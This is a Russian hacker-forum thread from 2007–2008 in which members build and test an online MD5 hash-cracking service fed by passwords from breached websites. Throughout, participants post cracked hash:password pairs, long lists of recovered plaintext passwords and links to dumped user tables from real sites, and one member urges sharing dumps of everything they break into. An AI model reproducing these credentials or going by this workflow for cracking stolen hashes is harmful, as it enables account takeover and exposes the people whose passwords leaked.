Просмотр полной версии : Античат online crack md5 service (тестим!)
Страницы :
[
1]
2
3
4
5
6
7
-=lebed=-
03.12.2007, 15:44
Античат online crack md5 service (версия 0.6 альфа)
Всего в базе1 266.395 Passwords (http://md5.xek.cc/ GO-> (http://md5.xek.cc/) ) - хэши только MD5!
Всего в базе2 3.327.022 Passwords (hashcracking.ru GO-> (http://hashcracking.ru)) - хэши MySQL, MD5, SHA-1, MySQL5
Базы содержат уникальные пароли из обоих тем, а так же реальные пассы из дампов баз нескольких сайтов.
Спасибо halkfild за скрипт (надо его доработать ещё), it's my и blackybr за предоставленные хосты.
Тестим на баги, на валид, добавляем уникальные пассы, прежде чем постить в раздел расшифровка МD5 можете прогнать сначала по этой базе, может быть ваш хэш уже предлагался к расшифровке и пароль найден...
Пособия для бруттеров:
Статья автора программы PasswordsPro (описание) (https://forum.antichat.ru/thread67547.html)
Атака на хэши (практическое руководство) (https://forum.antichat.ru/thread68675.html)
Атака на хэши часть II (Статистика - это сила!) (https://forum.antichat.ru/thread72506.html)
Изменения от 5.12.2007
процесс поиска стал дольше так как таких хешей нет в нашей базе
как происходит поиск:
1. принимаем значание хеша пользователя
2. ищем пасс по нашей базе
3. если нашли выводим и прекращаем действия
4. иначе парсим passcracking.ru
5. добавляем пароль в нашу базу, если найден.
6. добавил вывод всего количества записей в базе.
вообщем теперь у нас можно найти много хешей которых в базе пока нет.
7. по просьбам трудящихся сделал добавление словаря теперь добавление паролей будет намного быстрее. Те кто парсит стукните в пм дам ссылку на добавление сбрученых паролей чтобы не забивать базу мусором.
Изменения от 5.12.2007 22:00
благодаря blackybr
у нас новый быстрый хост и замечательный домен
/*blackybr трехкратное ура */
http://md5.xek.cc/
исправляйте закладки, теперь добавляем все сюда
Изменения от 11.12.2007
1. Ищем хэши паролей ещё и на plain-text.info.
2. Не найденные хэши тоже добавляются в базу, список которых доступен для локального перебора.
3. Прикручен фильтр на добавляемые пассы (не добавляются в базу "простые пароли", какие считаются простыми см. на сайте сервиса).
4. Добавлено автоудаление из списка хешей для брута, если найден пароль хэш которого был в списке.
5. Профиксена возможная XSS в поле пароль.
Изменения от 17.12.2007
такс.. скрипты подправил
простые пароли добавляются в базу, если они есть в очереди на расшифровку
/*изменения коснулись как простого добавления, так и группового)*/
Вообщем если хэш оказался в очереди на расшифровку, а пасс от него оказался простым, то пароли можно добавить в базу, хэши которых были в очереди на расшифровку. Таким образом чистим список не расшифрованных хэшей, т.е. расшифровываем... прим. -=lebed=-
з.ы. пишите о багах сюда
Изменения от 19.12.2007
1. Профиксены баги с кавычками и др. спец. символами в поле пароль.
2. Профиксен модуль возврата пароля с passcracking.ru (трабла с http-символами-заменителями в пароле и занесение неправильной информации в базу, теперь заносится именно пароль, а не его http-символы-заменители).
Изменения от 12.01.2008 (http://md5.xek.cc/)
1. добавил запрос на http://hashkiller.com тестируем.. пишем о багах))
2. как вы видели раньше, я говорил что самые активные брутеры хешей будут получать номерки, на этом промежуточном этапе получает номерок grishka в виду его активности по нашему проекту.
еще хотелось бы отметить ElteRUS, CraZy_R, Tiler2k, wers, dimon222 немного активнее и вы тоже получите свой бонус.
Изменения от 22.01.2008 (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php)
Новый дизайн главной страницы заценить (http://antichat-md5-crack.bolnoy.com/index3.php)
Изменения от 23.01.2008 (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php)
Исправлены некоторые баги:
1. Баг в функции дешифровки хэша из бинарной строки в читаемую, из-за которой иногда терялись нули (03->3) щас (03->03).
2. Баг из-за которого отбрасывались последние символы хэша, если его код пробел, т.е. если на конце хэша 20(hex). Исправил тип с VARBINARY (аналогичен CHAR в смысле обрезания пробелов на конце) на BLOB (настоящий бинарный тип ;-)
3. Очистил все очереди хэшей (так как там много невалида)
Изменения от 24.01.2008 (http://md5.xek.cc/)
все добавил.. наконец-то добрался до написания/исправления проекта вообщем изменения и тд ниже проект стал работать нааамного быстрее
[~] переписан на CURL парсинг passcracking.ru
[~] в ходе переделывания скриптов было обнаружено, что гейт выделеный
товарищами insidepro.com не работает уже.. я то ничего против не имею,
но предупреждать нужно.. =\
[+] сделан парс hash.insidepro.com
[~] переписан на CURL парсинг hashkiller.com
[+] добавлен md5.rednoize.com //что-то раньше я его пропустил немного :-[
таймаут поставил 5 сек
Изменения от 25.01.2008 (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php)
Исправил баг в функции декодирования хэша, из-за чего хэш не правильно отображался после извлечения из базы:
Т.е. например: 5c1e08165001340a650533827eaadac7 -> 5c1e0816500134010650533827eaadac7
Изменения 31.01.2008 (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php)
1. Теперь Вы сами можете добавить сбрученные Вами пароли, хэши которых есть в очередях расшифровки!
Другие пароли, хэшей которых нет в очереди, выкладывайте тут (они там не добавятся).
Линк для добавления паролей работает (http://antichat-md5-crack.bolnoy.com/cgi-bin/wlist.php)
2. Если Вам лень всё это проделывать вручную, к Вашим услугам PasswordsProBot (https://forum.antichat.ru/thread60511.html), который сделает всё автоматически.
3. Купил домен hashcracking.info (http://hashcracking.info)
Отдельное спасибо it's my за содействие...
Диз поставил пока тот, какой сам слепил ;)
Изменения 7.02.2008 (http://md5.xek.cc/)
06.02.2008 0:07:43
[+] добавлен парсинг gdataonline.com, что подразумевает добавление к базе
Цитата:Database contains 1,133,737,504 unique entries.
[+] добавлен парсинг md5.thekaine.de //по рейтингу нахождений в 1-вой десятке..
Изменения 18.02.2008 (http://hashcracking.info)
1. Оптимизирован алгоритм поиска/добаления хэшей/паролей (скорость поиска возросла).
2. Добавлена возможность работы с паролями, содержащими пробелы (возможно и др. непечатаемые символы) вначале, в середине и на конце пароля.
Т.е. пароли "QWERTY" и "QWERTY " считаются разными! Обращаю Ваше внимание, что хэши MySQL(64bit) от таких паролей одинаковые (это особенность самого алгоритма - пробелы вырезаются).
3. Добавлен вывод найденого пароля в hex виде, чтоб можно было увидить непечатаемые символы.
4. Тип данных в столбце пароль таблицы VARBINARY(32) заменён на BLOB(32) что позволило хранить пароли, содержащие пробелы на конце.
5. Поэтому очень ВАЖНО: Следите за ПРОБЕЛАМИ на конце пароля, при добавлении пароля, расшифрованных паролей от хэшей в очередях - они теперь учитываются!
6. Профиксен баг с неправильным парсингом пароля, содержащего одинарные или двойные кавычки с http://passcracking.ru. (функция htmlspecialchars_decode заменена на html_entity_decode с параметром ENT_QUOTES - html-сущности преобразуются в том числе в двойные и одиночные кавычки).
P.S. Прошу потестить сервис на другие пароли, содержащие непечатаемые символы, обращаю Ваше внимание что пара символов с кодами 0d 0a (hex) является концом пароля и отбрасывается, т.е. пароль не может содержать символ возврата каретки и перевода строки.
Изменения 02.03.2008 (http://antichat-md5-crack.bolnoy.com)
Вообщем представляем Вашему вниманию новый модернизированный двиг сервиса, результат почти месяца совместной работы.
1. Идея оптимизации принадлежит Red_Red1 (https://forum.antichat.ru/member.php?u=31716). Двиг был им полностью переписан.
2. Именно им была предложена новая структура базы (таблиц), благодаря которой наполнение базы можно осуществлять в сотню раз быстрее и при этом будут выполнены все проверки (на простоту пароля, на наличие хэша в очереди от пароля, на наличие пароля). В базе уже никогда не сможет быть повторяющихся паролей (pass - ключевое поле).
3. В остальном функционал и дизайн остался тот же, за исключением, некоторых косметических доработок.
Сервис находится на http://antichat-md5-crack.bolnoy.com и работает со своей, отдельной от hashcracking.info базой, хотя она и содержит в основной массе те же пароли.
4. Прошу проверить новый двиг на баги, нашедшим +
5. Двиг поддерживает спецсимволы в паролях, пробелы на конце пароля, национальную кодировку (1251).
Изменения 21.03.2008 (http://hashcracking.info)
1. Добавлено поле дата, для хэшей, которые попадают в очередь записывается текущая дата. Таким образом Вы можете видеть "возраст" хэша, и если он достаточно велик (более 1-3 месяца), то это говорит о достаточно сложном пароле, как правило > 8 символов, для которого большинство видов атак не увенчались успехом, т.е. вероятность того, что он будет расшифрован - > 0, такие хэши будут удалятся из очереди...
Изменения 24.03.2008 (http://hashcracking.info)
1.Добавлен индекс к полям хэшей -> скрость поиска по базе возрасла в 10К раз. (отдельное спасибо Red_Red1 за тесты на локалхосте)
2.Добавлена возможность добавления пароля от хэшей md5(md5(pass)) тут:
http://hashcracking.info/wlist.php
Т.е если вы брутили хэши с очереди MD5 по алгоритму md5(md5(pass)), то можете добавить сразу исходные пароли, установив данный флаг. (добавятся в базу как сами пароли, так и md5(pass) в качестве пароля, соответсвенно хэш md5(md5(pass)) пропадёт из очереди.
Желающие помочь проекту (кто брутит хэши) выкладывайте свои PasswordsPro.dic а так же пароли из дампов баз реальных сайтов и форумов в этот тред! Мы добавим в базу расшифрованные Вами, а так же реально использующиеся пароли.
P.S. Отзывы приветствуются. Скрипт доработаем современем, базу расширим...
81dc9bdb52d04dc20036dbd8313ed055:1234 -скрипт не находит
хех,добавил пароль-теперь находит,в базе не было даже 1234
c qwerty тоже самое,хотя они есть в архиве из этого (http://forum.antichat.ru/thread54603.html) поста
пара строк из этого же архива-не находит не один хеш
668041995dc9273fb8bc1537c4cc9bf4:658a52
66954abd950d13927dd16de30efba5de:wedasono
66987ce7134f63ef7ee6f5024ad312b3:GreenDay
66a70c9e3f345495c7d8558074db2ef4:545452
66a9d71bb947997b2ba5ad7d99307e4f:superhit
670b14728ad9902aecba32e22fa4f6bd:000000
P/S
nepoxek
your ipx.x.x.x
улыбнуло
а может каждый кинет по пассвордпро.дик а вы добавите? будет лучше
123 тоже не было/добавил теперь находит =)
Лебедь, хорошую идею предложили по пасспро.дик
Тут есть прикреплённая тема с общим файлом паролей, неплохо было бы его добавить
А вообще молодец что сам предложил и сам же реализовал, не без помощи участников канеш =)
}{0TT@БЬ)Ч
03.12.2007, 15:58
вот насчет добавлялки мне кажется пока не нужна она, так как начнут туда всю хрень вставлять и получится большинство один мусор надо реально сбрученные хеши кидать.
}{0TT@БЬ)Ч
03.12.2007, 16:03
и было бы интресно сколько хешей в базе видеть на самой странице:))))
и было бы интресно сколько хешей в базе видеть на самой странице:))))
согласен
sedoy_xxx
03.12.2007, 16:06
Что-то он совсем по хешам ничего не находит :(
Marlboro_X
03.12.2007, 16:20
есть несколько машин свободных, могу, если дадите софт генерить пассы + мд5, сколь угодно долго
могу на время хост дать, что бы не мочался... стучи в асекю
halkfild
03.12.2007, 17:09
мдям.. уже запостили(
это было написано за час в пятницу... там же нифига нет.. да и кривовато немного =\
вообщем хотел все нормально сделать, а уж потом постить..
лан.. если уже запостили, то добавляйте что хотите =) пусть хоть база пока набирается.
з.ы. сделаю нормально обновлю /*эх, лебедь =))*/
з.ы. непохек это я так добавил.. :D :D :D это просто дебаг /*писал за час с нуля :D :D */
-=lebed=-
03.12.2007, 17:15
Сервис переехал сюда http://antichat-md5-crack.bolnoy.com
ЗЫ Спсб. it's my за хост.
ищем по базе хэш
1cd4d78142e0398528f94d8d6183740e
и радуемся =)
ЛифчиС5СВ
03.12.2007, 17:24
Поздравляю! Есть с чем! =)
Ну а скрипт... надо, чтобы возвращало на главную страницу, чтобы сам не нажимал на Назад. Удобство.
-=lebed=-
03.12.2007, 17:29
Поздравляю! Есть с чем! =)
Ну а скрипт... надо, чтобы возвращало на главную страницу, чтобы сам не нажимал на Назад. Удобство.
halkfild доработает его...
1) поставь
onFocus="hash.value=''"
2) вернутЬся
3) спс за код кодирования мд5
Tukoitsr
03.12.2007, 17:39
неплохо)) жалко только нет тех хешов которые мну нада...
если чо вот:
284f088aa6b9d5aa437ea0c712113893
74622bfce815d62c8d69cecfb9c59fb5 - очень важный хэш!!!
9ae2e198f08a1a90c3c7b4ab275c4117
...Постил в подходящей теме но никто не может расшифровать...
Marlboro_X
03.12.2007, 18:23
сделайте автовозврат, так можно будет нагенерить пассов, если страница со "спасибо за пароль" будет возвращаться
halkfild
04.12.2007, 02:01
*добавил парсинг..
теперь то что вы ищете мы ищем в базе если нет, то смотрим дополнительно
вообщем теперь процес нахождения и наполнения будет намного быстрее.
з.ы. когда парсит надо немного подождать пока найдет =\
з.з.ы потестил немного вроде ок /*комментарии пишите тут*/
на данный в базе 3883 хеша.. пользуйтесь и добавляйте так мы сделаем его лучше
http://antichat-md5-crack.bolnoy.com
Еще сделать капчу и...
Warning: preg_match_all() expects parameter 2 to be string, array given in <b>/home/k000716/domains/antichat-md5-crack.bolnoy.com/public_html/cgi-bin/index.php on line 22
Раскрытие локальных путей
Поправьте... мелочи, а не красиво)
[Paran0ik]
04.12.2007, 07:26
скрипт выдает, что мд5(пароль) = db027d6af7ff52a049074c8a9b99d198
хотя на самом деле мд5(пароль) = 749789e4982b0c563f6729aac100a614
аналогично неправильно выдаются хеши других кириллических паролей...
думаю неплохо было-бы добавить это:
http://milw0rm.com/mil-dic.php
.................................................. ......
http://milw0rm.com/cracker/list.php
.................................................. ......
-=lebed=-
04.12.2007, 10:09
*добавил парсинг..
теперь то что вы ищете мы ищем в базе если нет, то смотрим дополнительно
вообщем теперь процес нахождения и наполнения будет намного быстрее.
з.ы. когда парсит надо немного подождать пока найдет =\
з.з.ы потестил немного вроде ок /*комментарии пишите тут*/
на данный в базе 3883 хеша.. пользуйтесь и добавляйте так мы сделаем его лучше
http://antichat-md5-crack.bolnoy.com
Подробнее опиши про парсинг.
1. Что парсит и где ?
2. Процесс нахождения стал дольше (из-за парсинга).
PS Сделай форму для добавления в базу словаря (списка паролей и вычисления по ним хэшей)
и добавь вывод колличества записей в таблице:
select count(*) from hash
halkfild
04.12.2007, 11:54
процесс поиска стал дольше так как таких хешей нет в нашей базе
как происходит поиск:
1. принимаем значание хеша в пользователя
2. ищем пасс по нашей базе
3. если нашли выводим и прекращаем действия
4. иначе парсим passcracking.ru
5. добавляем пароль в нашу базу
вообщем теперь у нас можно найти много хешей которых в базе пока нет..
а в базе только реальные пасссы которые искали наши пользователи
2[Paran0ik] неправильно считает жабаскрипт.. это не столь существенно, я это скоро вообще уберу /*так как основная задача искать пароль по хешу, а находить хеш с пароля нам незачем)*/
Elvis000
04.12.2007, 12:03
Выложите файлик с не расшифрованными хешами, у себя прогоню, может расшифруется еще.
-=lebed=-
04.12.2007, 12:31
Выложите файлик с не расшифрованными хешами, у себя прогоню, может расшифруется еще.
В аттаче.
вот из аттача:
:08e650d29c59d606ebabb1e95db39bd2::3wolga:
:a701645a4d039cc6a5cf233e71bf863e::43a788:
:350dcba977895bae38245d216da7e135::cyberfight:
:645bd7786d65f250ba9a2d0397dbe2f9::fereshte:
:0be4428a74712161d3f01909b8cff909::kjnkjhbty:
:4961a59a0ca8392fddc0b1777a934fc8::perepoloh:
:270dd1f86fd74391a930e6ef1d137dc9::ptdc44:
:5006255fa46ba5c5a4c1666942bccfab::shurik2007:
:4f632f51a968331289c4cec14b16d453::svadhyaya:
Elvis000
04.12.2007, 13:12
2 it's my давай, чтоб не путаться, не будем выкладывать кусками, проверь все 3547, расшифрованные выложи файликом, я так же сделаю, потом совместим и прогрммкой проверим, у меня из первых 50ти расшифровалось 7
Это все что я смог расшифровать, дома еще попробую
blackybr
04.12.2007, 13:19
не читал весь тред - влом)
думаю было бы неплохо искать по уже существующим подобным сервисам. вечером выложу те ко торыми сам реально пользуюсь
otmorozok428
04.12.2007, 13:21
А смысл-то проекта в чём вообще? Rainbow Tables уже есть... MD5Inside со словарями тоже никто не отменял... Или я чего-то не догоняю?
Проект мог бы быть интересен если бы он имел какие-то уникальные черты - то чего нету в других сервисах, например какую-то свою уникальную базу словарей. Допустим, так:
У меня есть дамп какой-нить базы с паролями в открытом виде. Там есть пароли которых нет ни в Rainbow Tables, ни в public-словарях. А принимая во внимание то, что юзеры любят ставить на все ресурсы (и даже если не на все, а только на часть) одинаковые пароли, парольчик может подойти к какому-нибудь хешику...
А дампы баз тут либо у каждого форумчанина имеются? То есть, если идею хорошенько продумать - можно сделать ДЕЙСТВИТЕЛЬНО интересный сервис.
Elvis000
04.12.2007, 13:23
думаю было бы неплохо искать по уже существующим подобным сервисам
Так и делаю, сначала по сервисам, затем в каине словарем. По таблицам пока не могу, еще 3 недели генериться будут.
halkfild
04.12.2007, 13:28
2 blackybr
по passcracking.ru я делаю поиск..
говорите что еще попарсить с больших баз добавим.
з.ы. добавил вывод всего количества в базе
Elvis000
04.12.2007, 13:29
2 otmorozok428 в том то и дело, что многие пароли в нашей базе уникальны, и расшифрованы с помошью брута или таблиц, а не поиском по онлайнсервисам. В самом начале про эту уникальность и писалось.
кст. еще раз хотелось бы напомнить про объединение всех passwordpro.dic и по поводу давабления паролей в базу, а может сделать что бы можно было не один пароль а хотя бы 10 добавлять
otmorozok428
04.12.2007, 13:50
2 Elvis000 Т.е. - это хеши, которых нету в Rainbow Tables, я правильно понимаю? Тогда, как насчёт вышеизложенной идеи с дампами баз?
-=lebed=-
04.12.2007, 14:03
2 Elvis000 Т.е. - это хеши, которых нету в Rainbow Tables, я правильно понимаю? Тогда, как насчёт вышеизложенной идеи с дампами баз?
Смысл проекта:
1. В уникальности паролей. Т.е. они с реально сбрученных существующих хэшей.
2. В Разных Rainbow Tables разные пароли. У меня таблиц на 40 Гб. - не запихивать же все содержащиеся в них хэши и пароли в базу.
3. Конечно, скидывай дампы баз будем добавлять реальные пароли :D
otmorozok428
04.12.2007, 14:22
Вот есть база на 1251 юзера.
Таблица с юзерами
http://www.itsme7.pochta.ru/player.sql.zip 31,2 KB,
только пароли
http://www.itsme7.pochta.ru/player2.sql.zip 6,34 KB.
halkfild
04.12.2007, 14:34
по просьбам трудящихся сделал добавление словаря
теперь добавление паролей будет намного быстрее.
з.ы. те кто парсит стукните в пм дам ссылку на добавление сбрученых паролей
з.з.ы. что бы не забивать базу мусором
Дампы таблицы users с 8 сайтов в разархивированнов виде вес 16.8 мб (архив 3 мб)
http://dump.ru/files/n/n9615769127/
-=lebed=-
04.12.2007, 14:57
по просьбам трудящихся сделал добавление словаря
теперь добавление паролей будет намного быстрее.
з.ы. те кто парсит стукните в пм дам ссылку на добавление сбрученых паролей
з.з.ы. что бы не забивать базу мусором
Добавляем пассы только из PasswordsPro.dic т.е. реально с сбрученых вами хэшей!
ЗЫ Потолок нашей базы на хосте владельца около 16 млн. записей (1 Гб) так что не стоит кидать туда просто словари (т.е. с не реальных хэшей).
вопрос: а при добавлении пассов, повторяющиеся пассы будут заменять друг друга или так же добавляться?
Ded MustD!e
04.12.2007, 15:05
Вобщем предлогаю выкладывать дампы ВСЕГО, что ламаем и добавлять из них хэши в базу, так мы быстро забьем базу реальными паролями.
halkfild
04.12.2007, 15:07
2 it's my при добавлении существующего паса тебе выдаст что он есть уже в базе
так что все вроде ок
В нашей базе 8105 хешей
Iceangel_
04.12.2007, 15:08
Так сказать окажем маленькую поддержку проекту... =)
расшифровал хеши из списка нерасшифрованных, которые сегодня выложил -=lebed=-
0b728cdfe6ea4458d0d8bbfc49d70134:joy180883
327a4df0c20486c568d3670e151f9821:andrea020286
687bb49b1748041f0dfb33e27dad4722:alex0202
7d7fdf21e241d015d1e32ea2489dcfc6:admintime
b868ff2015ab66fd38145b2bd5dc71d9:adm270478
d3df61902e9b47d962cb29caeeace997:alex242424
f12bf2576b1a4c478451de4683252c78:adminqwaszx
f4777749f513a61d96b218325b2432ef:cookie123qwe
e3532fa37684ea7e5cdcd4afae2893bb:max200790
P.S
Если это реально нужно, то я мог бы постараться...
halkfild
04.12.2007, 15:14
если выкладываете сюда пассы, то выкладывайте без хешей /*удобнее для добавления*/
скрипт для разделения пасой от хеш:пасс выкладывал
з.ы. те кто много брутит пишите мне в пм дам ссылку на скрипт для добавления сразу нескольких паролей в базу
а как на счет пустого пароля, он есть?
[Paran0ik]
04.12.2007, 15:30
а как на счет пустого пароля, он есть?
есть :)
Ded MustD!e
04.12.2007, 17:00
собрал все дампы которые были, получился файл 38.8 метров, выкладывать?
-=lebed=-
04.12.2007, 17:04
собрал все дампы которые были, получился файл 38.8 метров, выкладывать?
С дампов нужны только пароли!
ЗЫ добавил пароли с дампа dump_www.xxx.com_17-10-2007-13-00-27
Elvis000
04.12.2007, 17:24
тут 85 расшифрованых хешей из 600 первых которые были в последнем приаттаченом -=lebed=- файле: http://elvis000.ifolder.ru/4415976
зы: брутятся дальше, просто я спать, проснусь оставшиеся выложу.
-=lebed=-
04.12.2007, 18:53
тут 85 расшифрованых хешей из 600 первых которые были в последнем приаттаченом -=lebed=- файле: http://elvis000.ifolder.ru/4415976
зы: брутятся дальше, просто я спать, проснусь оставшиеся выложу.
Добавил
Elvis000
05.12.2007, 02:54
Продолжение:
suliban408
Cranberries75
isnotjoke
gjnt[f
7ee30f2bfd6f6632fb070a691a88168e
kariz1313
hyp3r1969
MWcc1975
pinondohan
2b73dc932975831609bcccfb0a64e1d5
Dorn6970
SAA478436
T@b@sc0
2rew1212
78mcolor
bec4182df91bd264c1a6cb1e3cab0279
1dominik2
xdfbdftr5
rizzolinchen
c8соболев
mnms200920
Spezies5618
andrea020286
nopassgav
shihanmirko
123newpassword321
pcom33233
c27c86fee6da93d329cdba05c470a43e
2822TUBMAN
schulwerk
cyberfight
nikopolitka
scampido0
p3n1nsul4
arsenaltheone
rfn.if545
100200kjp
b44370c19ec7cdbb76f18680a089da35
GambitDB2
Char@007
P455W0rd
degussa0054
tal135132
kamikaze1406
Esiadmin
plasma0062
Manullm
04232rigo
all4free4all
Kuriok3V
2Million
12berit34
baconFat23
147a13e26b33a310fc6278125134b8ae
degwy12345
v4nD4l3n
astro10boy
UXBXSQMR
utybq197666
estrees1737
gambaruum
ilteo1980
7b5fef34a74873eedf4e660fc3f2bdaa
b0b$e@v
cimbali
diamondfish316
cipanbiru
gr-editor
blacklenin2
missionblackwolf
зфтеукФ
QAZxswQAZ
valex2109
napoli1926
0408arpin
;tybxrf
alpedhuez
vlad01072006
suppamaryes
AEROadmin2
-=lebed=-
05.12.2007, 03:24
Продолжение:
suliban408
Cranberries75
---------------
AEROadmin2
Добавлены в базу
Вношу свою лепту:
Файл содержит около 17000 паролей
http://slil.ru/25191692
-=lebed=-
05.12.2007, 10:32
Вношу свою лепту:
Файл содержит около 17000 паролей
http://slil.ru/25191692
Добавлено, всего в базе 38027 хешей.
Elvis000
05.12.2007, 13:37
Продолжение
kamikaze1947
primedtarget
10223589652
Janakin1
1313goteki
lore69110
kotenoksss
Root@hack
ronjamaus
killer7701
721557
шеыфдды
RUTYWEME
pfcpfcpfc
1529dioma
senseikjs
2draconia11
9e51d857c535042eab670547eeb204c1
d7afde3e7059cd0a0fe09eec4b0008cd
motdepasse123
better1526
adminchsec
nipponese1991
[htydfvdctv
samschiller
Офсл11
spiderboy1
rom2006mv
csikszidi
F@lconer1
rb,elf
03admin05
ImageMaker
Alexis0318
jrizals2002
.thepassD
pu55yf4rt
weldportal
setaresetare
29062006tc
enlapuerta
MARTINA131285
champ12_1
mongoslave
DamianXXL
happyhiper
fereshte
4allthebest
moder123qwe
adm31415926
cmitalia2
jenn1fern
administratorcafe
MSSA2005
garage884
qaz123overdoze
47983234798323
teangoish
bfoomiffq
D1g1taLs
macheboard
woodearth855
lopokin80
Lynnet222
26077dimas
toto24311
zerotonine
szwagier93
f0fee5650c92a2d28715070d15f88eb8
gelbfisch
Werder-Bremen
blueawassa
arocycloud
64thomas8
biletnist
AA751104
jmfklsurr
1Radish?
leftsheep86
stas101101
ag82hsts
jeepjeep94
q1w2e3r4t5i
Warez
tobaccoh7t
KhRto93
evyfzvfif
9e432135ae20d9072fcf4e1d648b97e6
admintime
unnamed13
jerryguan
Linda2115
212filipp
olanrewaju07
romandurak
alvaromalena
evelin319087
mandy1990
kaikinkoro
qw12Er34
сщвукгк
3,141592654
ghjcnjyjdsq
Rapsodia
creatine@1l
b578e463213fcfc543541983efc7816b
wearelegion
74622s57rkzw
zcvbhyjd
215611.
qwert12r7
:orion666
3855sasha123
linuxhost36
godzilligan
chuvakin123
buffee623
Aff-dog
Cafe-Royal
ovidiu43210
cosmos87
6af93fa45cfc39e697ee658d2dc8c25f
ADAMMAURICE
cmcclimber
referentor
mce123789
prisonBREAK
nofate
berlin6a5
arwin15937
polytoxikomanie
1234567Aa
somberlain
salvaje1004
3521ae12a45d29951f140c60473fa912
faktor-2
clydez2000
Cancer21
derjoerchen
sev123456
fremdenhass
Polli0809
-=lebed=-
05.12.2007, 13:44
Продолжение
kamikaze1947
primedtarget
---------------
fremdenhass
Polli0809
Добавлено, итого в базе 38189 хешей
сегодняшние дампы:
http://dump.ru/files/n/n5096081615/
http://dump.ru/files/n/n2559407004/
Посмотри пожалуйста может мой исходник пригодится для усовершенствования вашего сервиса
https://forum.antichat.ru/showthread.php?t=47810
halkfild
05.12.2007, 17:15
добавил большой словарь с брученых пользовательских форумов и тд
пароли не простые)
В нашей базе 88996 хешей
-=lebed=-
05.12.2007, 18:40
паролей добавлено в базу: 3411 (с дампа)
halkfild
05.12.2007, 23:08
обновление в проекте:
благодаря blackybr
у нас новый быстрый хост и замечательный домен
/*blackybr трехкратное ура :D :D :D */
http://md5.xek.cc/
исправляйте закладки, теперь добавляем все сюда
з.ы. всю базу перенес
В нашей базе 92448 хешей
з.з.ы. там поставлю редирект
з.з.з.ы. работаем дальше ;)
Elvis000
06.12.2007, 11:15
Последнии из ачатовских:
05loverule
progress1324
CZ123456*
dashmehrdad
2000Memento
cloaksheed
ageev1102
timescafe
fforgforum
1010am2007
CADLsolo
ghjcnjvfhbz
п00вдгсл
ad20056min
cfIeylth
schism5derby
starfouett
g3tback!
Westlake91361
gavrikloh
artmagneat
schnidak
detewe520
27Rapid27
WineRay6
PUNK4ever
admin678427
Berner3006
198211bad
Iamadmin
12081989катя
samirrr10
qyhdt7b4vx
cosmin132
123789ABC
zorro_007
ebdbdd0f766146e02d6b34c852d2c69c
brunson101
lillo1969
forumarchi
XYRIXEWY
ApsonForum
lzlzdjkjlz
adm270478
fictor902
mimone77
2happyman
inc0mpetent
Dctvghbdtn
lbhtrnjhh
neptuniax1
dbnfvbyrf2
wakwak00p
realshkola
fujitsusamsu
pkjqvtldtl
ltkmabyjxrf
joss311la
nalarat
KAKAwert
bluecoaster
extraimage
Andreas210467
fender150664
darkonline
madrid cf
akszysz1
hyp3rspac3
driseifua
litsiteadmin
yjdsqgbnth
postnukeadmin
ginmegaron
123bitch12
37freaky55
alex242424
skullcrusher86
tamaran125
pdthbpdthb
kolya21
sr20ulose
matri.monio
timred205
230189521771
dbrnjhbzgj,tlf
formydaddy
Dust_all
grapemouse
22iun1941
destiny4real
digitech122
BlueSky79
Ддимка
333gjhjctyrf
dcfc241a3b9970ddce6b3764df28f7ec
AnnaGerman
somethingweird
gul610606
arrietty1471
Imation1
clight2004
52de0307df32605c9fc12cad4eba7b2d
PRESARIO2100
hell0Jed
roflowned
nomorehackers
civili7ed
d0414bf0e5ecd387dfe4a684dbf85cd4
ntmsports123
Flower#01
Work0815
123456zxcv
amigaisdead
vinbikepass
kotego887
56060dwarf
18prophat
xpainkiel
Matvienko
quakemetender
sps
marko123abc
cxx528528
p455w0rdbs
fa26fa26fa
@7539515
ol777ol777
adminqwaszx
ytathnbnb55
26475renato
mik76cmsadmin
4miganomore
colestrete
cookie123qwe
witttmannn
moneyraiser
flypigfly
dayxwinner
londonbest
gillian01
1234eckstein
66rebmevon40
sinead...
gocards05
NikonD70x
1637utena
admin123qaz
freddybax
Siguranza
ryzer666
admin_host
Dipoxx96
dupajasiutest
AdminPasswd
Isudzu
-=lebed=-
06.12.2007, 11:43
Последнии из ачатовских:
05loverule
progress1324
------------
Isudzu
Добавлено!
уникальных паролей добавлено в базу: 142
неуникальных паролей: 13
-=lebed=-
06.12.2007, 14:37
Предложение по сервису:
Не вижу смысла хранить в онлайн базе хэши легких паролей (если они даже существуют и ими кто-то пользуется), которые подбираются за считанное время тупым бруттом, а именно:
1. Only numeric (0-9) 1-8
2. Only loweralpha (a-z) 1-6
3. Only alpha (A-Z) 1-6
Ваши предложения, какие пароли там не нужны?
P.S. В нашей базе 100190 хешей!. Респект FHT за свой большой PassworsPro.dic и за Раптор. Фильтрую потихоньку, добавляю только уникальные и сложные пароли.
Что то я смысл не понимаю-хранить токо сложные пароли?Ведь они уникальны и их ну оочень много,и база со всеми сложными пассами будет весит немало.Помоему лучше там простые пароли -чтобы юзер сначала прогонял их по базе,а если пасс сложный,то просил о помощи
Или я чтото не так понимаю?
мой passpro.dic (http://proxy-socks.info/loads/PasswordsPro.DIC)
-=lebed=-
07.12.2007, 18:55
Добавил расшифрованные пароли из ранее нерасшифрованных из тредов на форуме. (прогнал по таблицам).
уникальных паролей добавлено в базу: 1032
неуникальных паролей: 2
А так же то что дал v1ru$
PS Смысл в том что простые пароли хранить нет смысла, так как они есть как в других базах онлайн, так и быстро подбираются тупым брутом.
В нашей базе 112111 хешей
PS Подправил скрипт на старом хосте, добавил проверку пассов (при добавлении в базу). Тестим: http://antichat-md5-crack.bolnoy.com/cgi-bin/index1.php
-=lebed=-
10.12.2007, 12:45
Обновил двиг на http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php (старый проект)
1. Если хэш нигде не найден (ни у нас в базе ни на passcracking) то он всё равно заносится в базу, для формирования списка не расшифрованных хэшей.
2. Список хэшей предлагаемых к расшифровке тут: http://antichat-md5-crack.bolnoy.com/cgi-bin/noncrack.php
Находим соответсвующие им пароли и добавляем их тут: http://antichat-md5-crack.bolnoy.com/cgi-bin/wlist.php
ЗЫ Тестим, выявляем ошибки!
To halkfild файлы в аттаче, как заберёш удалю...
ЛифчиС5СВ
10.12.2007, 13:34
1. В нашей базе содержаться - мягкий знак не нужен.
2. Вы можете помочь, проекту и другим - запятая не нужна.
3. Страницу оптимизировать под поисковики не будем? Чтобы она стала популярной среди хакеров других сайтов.
-=lebed=-
10.12.2007, 14:30
1. В нашей базе содержаться - мягкий знак не нужен.
